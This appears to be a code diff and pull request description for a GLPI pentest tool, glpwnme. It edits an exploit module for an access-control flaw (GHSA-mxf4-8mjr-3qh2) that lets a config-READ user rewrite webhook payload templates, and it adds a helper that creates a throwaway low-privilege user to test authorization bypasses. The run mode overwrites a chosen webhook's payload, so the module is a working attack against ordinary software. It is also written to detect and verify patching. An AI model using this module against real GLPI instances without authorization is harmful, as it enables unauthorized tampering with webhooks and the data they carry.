+            Log.err("Denied (patched or no config right)")
+        else:
+            Log.msg(f"Webhook {webhook_id} payload template set to {payload!r} (HTTP {r.status_code})")

--- a/glpwnme/exploits/implementations/ghsa_mxf4_8mjr_3qh2.py
+++ b/glpwnme/exploits/implementations/ghsa_mxf4_8mjr_3qh2.py
@@ -95,16 +95,16 @@ class GHSA_MXF4_8MJR_3QH2(GlpiExploit):
                              headers={"X-Glpi-Csrf-Token": csrf, "X-Requested-With": "XMLHttpRequest"},
                              verify=False, allow_redirects=False)
             if r.status_code == HTTPStatus.FORBIDDEN or "access denied" in r.text.lower():
-                Log.log("update_payload_template denied for config-READ user (UPDATE gate present) — patched (11.0.7+)")
+                Log.log("update_payload_template denied for config-READ user (UPDATE gate present) - patched (11.0.7+)")
                 return False
             # confirm the effect: the probe rewrote the webhook payload
             if (self._payload_of(wid) or "") == marker:
                 Log.msg("config-READ user rewrote a webhook payload template (no UPDATE check) → "
                         "unauthorized webhook tampering (GHSA-mxf4-8mjr-3qh2)")
                 return True
-            Log.msg("config-READ user reached update_payload_template without the config UPDATE right "
-                    "(GHSA-mxf4-8mjr-3qh2)")
-            return True
+            Log.log("Request was not rejected but the payload was not rewritten - no demonstrated "
+                    "tampering, not confirming")
+            return False
         finally:
             if wid:
                 self._purge_webhook(wid)

--- a/glpwnme/exploits/implementations/ghsa_mxf4_8mjr_3qh2.py
+++ b/glpwnme/exploits/implementations/ghsa_mxf4_8mjr_3qh2.py
@@ -20,7 +20,7 @@ class GHSA_MXF4_8MJR_3QH2(GlpiExploit):
     Fix (11.0.7): the check becomes $webhook->can($webhook_id, UPDATE), which
     requires the config UPDATE right.
 
-    @author unclej4ck
+    @author HuajiHD
     @cvss 4.3
     @name GHSA_MXF4_8MJR_3QH2
     """
@@ -111,7 +111,7 @@ class GHSA_MXF4_8MJR_3QH2(GlpiExploit):
                 return False
             # confirm the effect: the probe rewrote the webhook payload
             if (self._payload_of(wid) or "") == marker:
-                Log.msg("config-READ user rewrote a webhook payload template (no UPDATE check) → "
+                Log.msg("config-READ user rewrote a webhook payload template (no UPDATE check) -> "
                         "unauthorized webhook tampering (GHSA-mxf4-8mjr-3qh2)")
                 return True
             Log.log("Request was not rejected but the payload was not rewritten - no demonstrated "

--- a/glpwnme/exploits/implementations/ghsa_mxf4_8mjr_3qh2.py
+++ b/glpwnme/exploits/implementations/ghsa_mxf4_8mjr_3qh2.py
@@ -33,9 +33,6 @@ class GHSA_MXF4_8MJR_3QH2(GlpiExploit):
     _ENDPOINT = "/ajax/webhook.php"
     _WH_FORM = "/front/webhook.form.php"
 
-    def _fcsrf(self, p):
-        m = re.search(r'name="_glpi_csrf_token"\s+value="([^"]+)"', self.get(p).text)
-        return m.group(1) if m else ""
     def _meta(self, session, p="/front/central.php"):
         m = re.search(r'(?:name|property)="glpi:csrf_token" content="([^"]+)"', session.get(p).text)
         return m.group(1) if m else ""
@@ -44,7 +41,7 @@ class GHSA_MXF4_8MJR_3QH2(GlpiExploit):
         r = self.post(self._WH_FORM, data={
             "add": "1", "name": "glpwnme_tpl_wh", "itemtype": "Ticket", "event": "new",
             "url": "http://172.22.0.1/glpwnme", "http_method": "POST", "use_default_payload": "1",
-            "is_active": "1", "entities_id": "0", "_glpi_csrf_token": self._fcsrf(self._WH_FORM)},
+            "is_active": "1", "entities_id": "0"},
             allow_redirects=False)
         m = re.search(r"\.form\.php\?id=(\d+)", r.headers.get("Location", ""))
         if m:
@@ -72,10 +69,8 @@ class GHSA_MXF4_8MJR_3QH2(GlpiExploit):
         return None
 
     def _purge_webhook(self, wid):
-        c = self._fcsrf(f"{self._WH_FORM}?id={wid}")
-        if c:
-            self.post(self._WH_FORM, data={"id": wid, "purge": "purge", "_glpi_csrf_token": c},
-                      allow_redirects=False)
+        self.post(self._WH_FORM, data={"id": wid, "purge": "purge"},
+                  allow_redirects=False)
 
     def infos(self):
         infos = "[u]Description:[/u]\n"
@@ -126,10 +121,9 @@ class GHSA_MXF4_8MJR_3QH2(GlpiExploit):
         if not webhook_id:
             Log.err("webhook_id is required: --run -O webhook_id=<id>")
             return
-        csrf = self._meta(self.glpi_session)
         r = self.post(self._ENDPOINT, data={"action": "update_payload_template", "webhook_id": webhook_id,
-                                              "payload_template": payload, "use_default_payload": "false",
-                                              "_glpi_csrf_token": csrf}, headers={"X-Glpi-Csrf-Token": csrf, "X-Requested-With": "XMLHttpRequest"}, allow_redirects=False)
+                                              "payload_template": payload, "use_default_payload": "false"},
+                      allow_redirects=False)
         if r.status_code == HTTPStatus.FORBIDDEN:
             Log.err("Denied (patched or no config right)")
         else:

--- a/glpwnme/exploits/lowpriv.py
+++ b/glpwnme/exploits/lowpriv.py
@@ -1,0 +1,71 @@
+"""Helper to spawn a throwaway low-privilege (Self-Service) GLPI user session.
+
+Authorization-bypass CVEs only show a vuln/patched differential when exercised as a
+user who SHOULD be denied. The tool usually runs with an admin credential, so this
+creates a temporary Self-Service user via the admin session, logs in as that user, and
+returns the low-priv session plus a cleanup() that purges the user.
+"""
+import re
+from glpwnme.exploits.utils import GlpiSession, GlpiCredentials
+
+_PROBE_NAME = "glpwnme_lp_probe"
+_PROBE_PW = "Glpwnme_Probe_9173!"
+
+
+def _csrf(session, path):
+    m = re.search(r'name="_glpi_csrf_token"\s+value="([^"]+)"', session.get(path).text)
+    return m.group(1) if m else None
+
+
+def _find_user_id(session, name):
+    r = session.get("/front/user.php", allow_redirects=True)
+    m = re.search(r"user\.form\.php\?id=(\d+)[^>]*>\s*" + re.escape(name), r.text)
+    if m:
+        return m.group(1)
+    ids = re.findall(r"user\.form\.php\?id=(\d+)", r.text)
+    return max(ids, key=int) if ids else None
+
+
+def spawn_lowpriv(admin_session, profile_id="1"):
+    """Return (lowpriv_session, cleanup) or (None, noop).
+
+    profile_id 1 = Self-Service (lowest). The lowpriv_session is logged in and ready.
+    cleanup() purges the throwaway user. Returns (None, noop) when the admin session
+    cannot create a user (e.g. it is itself low-priv) so callers can fall back to the
+    provided session.
+    """
+    def noop():
+        return None
+
+    csrf = _csrf(admin_session, "/front/user.form.php")
+    if not csrf:
+        return None, noop
+
+    admin_session.post("/front/user.form.php", data={
+        "add": "1", "name": _PROBE_NAME, "password": _PROBE_PW, "password2": _PROBE_PW,
+        "_profiles_id": profile_id, "profiles_id": profile_id,
+        "entities_id": "0", "_entities_id": "0", "is_active": "1",
+        "_glpi_csrf_token": csrf,
+    }, allow_redirects=False)
+
+    uid = _find_user_id(admin_session, _PROBE_NAME)
+
+    def cleanup():
+        if not uid:
+            return
+        c = _csrf(admin_session, f"/front/user.form.php?id={uid}")
+        if c:
+            admin_session.post("/front/user.form.php",
+                               data={"id": uid, "purge": "purge", "_glpi_csrf_token": c},
+                               allow_redirects=False)
+
+    try:
+        lp = GlpiSession(target=admin_session.target, proxies=None, headers=None,
+                         credentials=GlpiCredentials(_PROBE_NAME, _PROBE_PW, None, None, None, None))
+        lp.init_session()
+        if lp.login_with_credentials():
+            return lp, cleanup
+    except Exception:
+        pass
+    cleanup()
+    return None, noop


### PR DESCRIPTION
Broken-access-control, IDOR and information-disclosure modules split out of #12. Each proves a lower-privileged or unauthenticated actor reaches data or actions it should not, with a negative control.

Notes:
- Split from #12, one PR per vulnerability class.
- Uses the existing `self.get`/`self.post` helpers (CSRF + URL expansion); a few apirest and edge calls stay direct where the helper would add nothing.
- Exercised against live 10.0.x/11.0.x vulnerable and patched instances.
- Includes `glpwnme/exploits/lowpriv.py` (shared low-privilege test-account helper); it also appears in the other access/SSRF/ATO splits, so merge it once and the rest rebase cleanly.

Update: corrected the privilege on `CVE-2026-42318`. The planning `delete_event` action runs `Session::checkCentralAccess()` then `$extevent->check(-1, DELETE)`, so it needs DELETE on `PlanningExternalEvent`, which is Admin or Super-Admin by default; a plain Technician is denied, verified on 10.0.24. `_privilege` is now `Admin`, and the finding is that this planning-scoped right deletes any itemtype with no per-object check. The detection differential is unchanged: deletes the probe on 10.0.24, rejected on 10.0.25.
